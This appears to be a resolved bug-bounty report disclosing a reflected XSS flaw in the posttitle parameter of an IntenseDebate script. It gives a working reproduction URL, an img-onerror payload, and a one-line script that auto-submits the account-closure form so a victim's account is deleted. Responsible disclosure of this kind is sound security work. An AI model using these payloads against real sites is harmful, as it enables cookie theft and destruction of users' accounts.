Reflected XSS in https://www.intensedebate.com/js/getCommentLink.php
Medium
A
Automattic
Submitted None
Actions:
Reported by
sudi
Vulnerability Details
Technical details and impact analysis
Hey there,
I have found a reflected dom xss vulnerability in your website www.intensedebate.com, the *posttitle* parameter is vulnerable.
---------------------------------------------------------------------------------------------------------------------------------------------------
**Full url:** https://www.intensedebate.com/js/getCommentLink.php?acct=c90a61ed51fd7b64001f1361a7a71191&postid=https://web.archive.org/web/20170820134008/https://mronline.org/2010/12/08/jobs-liberty-and-the-bottom-line/&posturl=https://web.archive.org/web/20170820134008/https://mronline.org/2010/12/08/jobs-liberty-and-the-bottom-line/&posttitle=xss
**Parameter:** posttitle
**XSS Payload:** "><img src=x onerror=alert(1)>
---------------------------------------------------------------------------------------------------------------------------------------------------
**Steps to reproduce:**
Just load this url in your browser and you will get the xss popup
https://www.intensedebate.com/js/getCommentLink.php?acct=c90a61ed51fd7b64001f1361a7a71191&postid=https://web.archive.org/web/20170820134008/https://mronline.org/2010/12/08/jobs-liberty-and-the-bottom-line/&posturl=https://web.archive.org/web/20170820134008/https://mronline.org/2010/12/08/jobs-liberty-and-the-bottom-line/&posttitle=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
---------------------------------------------------------------------------------------------------------------------------------------------------
**POC:**
{F1094491}
-----------------------------------------------------------------------------------------------------------------------------------------------------
## Impact
An attacker steal cookies of logged in users just by sending the url with the xss-payload, can redirect users to another websites,virtual defacement,etc.
Also Looking at the page: https://www.intensedebate.com/your-information, there are two actions available *Account Closure*, *Data export* with the xss we can perform this action on behalf of the user for eg:
```javascript
document.getElementById('frm2').submit();
```
With a js code like this we can auto submit this form so that when the user visits the url, his/her account will automatically will be deleted.
Thankyou
Kind Regards
Sudhanshu
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected